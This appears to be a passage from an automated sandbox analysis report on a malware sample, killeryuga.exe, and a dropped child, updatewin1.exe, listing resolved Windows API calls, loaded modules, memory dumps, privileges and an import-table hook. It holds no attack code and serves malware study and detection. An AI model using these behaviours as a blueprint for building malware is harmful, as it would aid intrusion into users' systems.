Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x74d4cc89 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x75af1ace True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x75b14124 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x75b1232e True 1
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x75b1555d True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x75af138a True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x75ae7590 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x75b1439f True 1
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x7560503c True 1
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x755feba1 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x755e6143 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 1
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x74f56c3c True 1
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x74f6011a True 1
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x74f7ed56 True 1
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77194100 True 1
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x74f63e75 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 3
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
System (252)
Operation Additional Information Success Count
Get Time type = System Time, time = 2019-03-24 16:36:39 (UTC) True 1
Get Time type = Ticks, time = 121961 True 1
Get Time type = Performance Ctr, time = 18452518574 True 1
Get Info type = Hardware Information True 249
Environment (1)
Operation Additional Information Success Count
Get Environment String - True 1
Process #7: killeryuga.exe
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --Service 2460 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:59, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
Information Value
PID 0x9d8
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x9DC
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
Host Behavior
File (3)
Operation Filename Additional Information Success Count
Open STD_INPUT_HANDLE - True 1
Open STD_OUTPUT_HANDLE - True 1
Open STD_ERROR_HANDLE - True 1
Module (184)
»
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 13
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x76c33c5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x76c5a959 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x76cb7198 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x76cb75fe True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x76cbd232 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x76c5d594 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x76c3418b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x76c31462 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x76c3cb29 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x76c31400 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x76c34a2d True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x76c335b7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x74d4b58c True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x74d819b8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x74d4c57a True 1
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x74d83389 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x74d69a12 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x74d830a8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x74d4cc89 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x74d830b8 True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x75af7121 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x75afb6da True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x75af1ace True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x75af6e71 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x75ae4de0 True 1
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x75b14124 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x75b1232e True 1
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x75b1555d True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x75af138a True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x75ae7590 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x75b1d9dc True 1
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x75b1439f True 1
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x75afb2b9 True 1
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x7560503c True 1
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x755feba1 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x7563dc53 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x755e6143 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x756632d4 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x760f1c24 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 1
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x74f56c3c True 1
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x74f6011a True 1
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x74f7ed56 True 1
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77194100 True 1
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x74f63e75 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 3
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
System (252)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-03-24 16:36:39 (UTC) True 1
Get Time type = Ticks, time = 122070 True 1
Get Time type = Performance Ctr, time = 18467392580 True 1
Get Info type = Hardware Information True 249
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Process #8: updatewin1.exe
Information Value
ID #8
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:01:03, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
Information Value
PID 0x9ec
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x9F0
0x9F4
0x9F8
0xA04
0xA08
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x00275000 0x00275FFF Marked Executable - 32-bit - False
updatewin1.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
updatewin1.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False
Hook Information
Type Installer Target Size Information Actions
IAT private_0x0000000000260000:+0x16795 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x00000000007f0000:+0x77f6f6
Host Behavior
File (6)
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Open STD_OUTPUT_HANDLE - True 2
Open STD_ERROR_HANDLE - True 2
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe show_window = SW_SHOW True 1
Module (154)
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Load KERNEL32.dll base_address = 0x76c20000 True 1
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Load SHELL32.dll base_address = 0x75fd0000 True 1
Load SHLWAPI.dll base_address = 0x75340000 True 1
Load msvcr100.dll base_address = 0x749c0000 True 1
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Load kernel32 base_address = 0x0 False 2
Load kernel32 base_address = 0x76c20000 True 2
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe base_address = 0x400000 True 2
Get Handle mscoree.dll - False 1
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
